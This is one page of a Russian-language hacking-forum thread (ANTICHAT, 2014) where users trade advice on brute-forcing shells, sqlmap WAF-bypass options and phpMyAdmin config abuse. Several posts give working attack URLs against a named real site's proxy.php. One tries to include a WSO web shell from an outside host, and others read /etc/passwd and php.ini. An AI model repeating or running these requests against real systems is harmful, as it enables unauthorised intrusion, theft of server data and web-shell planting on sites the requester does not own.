HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2331 из 2438 « Первая < 13311831223122812321 2327 2328 2329 2330 2331 2332 2333 2334 2335 234123812431 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23301  
Старый 15.02.2014, 17:04
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию
Цитата:
Сообщение от CoolHucker  
CoolHucker said:
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
Брутят, вы не поверите, брутом. Все тупо до безобразия. Фтп как правило тырят ботами с машин. Шеллы массово - через дыры в популярных цмс.

Сканер выкидывайте и учитесь работать руками. Когда сможете написать свой или с первого взгляда описать алгоритм любого такого сканера - тогда и будет толк от их использования.
 
Ответить с цитированием

  #23302  
Старый 16.02.2014, 20:11
lansia
Guest
Сообщений: n/a
Провел на форуме:
42267

Репутация: 5
По умолчанию
Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?
 
Ответить с цитированием

  #23303  
Старый 17.02.2014, 05:17
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию
Цитата:
Сообщение от lansia  
lansia said:
Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?
м.б слэш лишний? или путь /etc/phpmyadmin/config.inc.php
 
Ответить с цитированием

  #23304  
Старый 17.02.2014, 14:26
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию
Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/
 
Ответить с цитированием

  #23305  
Старый 18.02.2014, 07:45
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию
Цитата:
Сообщение от WallHack  
WallHack said:
Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/
Как подсказывает ман:

Цитата:
Сообщение от None  
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
 
Ответить с цитированием

  #23306  
Старый 21.02.2014, 18:51
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию
Приветствую,вообщем нужно мне подтянуть знания по RFI

Вопрос собственно -как проинклюдить ,почему не получается и как можно решить?

Для примера нашел вот

h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt
 
Ответить с цитированием

  #23307  
Старый 21.02.2014, 19:31
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от grimnir  
grimnir said:
Приветствую,вообщем нужно мне подтянуть знания по RFI
Вопрос собственно -как проинклюдить ,почему не получается и как можно решить?
Для примера нашел вот
h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt
просто читалка.

http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd

http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt
 
Ответить с цитированием

  #23308  
Старый 21.02.2014, 19:50
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию
Цитата:
Сообщение от попугай  
попугай said:
просто читалка.
http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd
http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt
Вьехал, тогда буду LFI использовать. Интересно было просто почему команды не выполняются при RFI инклюде.

А читалкой поищу что-нибудь полезное )

http://careers.ieee.org/test/redesign/proxy.php?url=/usr/local/lib/php.ini
 
Ответить с цитированием

  #23309  
Старый 21.02.2014, 20:17
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от grimnir  
grimnir said:
Вьехал, тогда буду LFI использовать. Интересно было просто почему команды не выполняются при RFI инклюде.
Там нет ни RFI, ни LFI. Есть RFR и LFR(Remote File Reading и Local File Reading)
 
Ответить с цитированием

  #23310  
Старый 22.02.2014, 14:14
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
никто не в курсе как через БД joomla найти путь к сайту которому эта БД пренадлежит
 
Ответить с цитированием
Ответ
Страница 2331 из 2438 « Первая < 13311831223122812321 2327 2328 2329 2330 2331 2332 2333 2334 2335 234123812431 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT.XYZ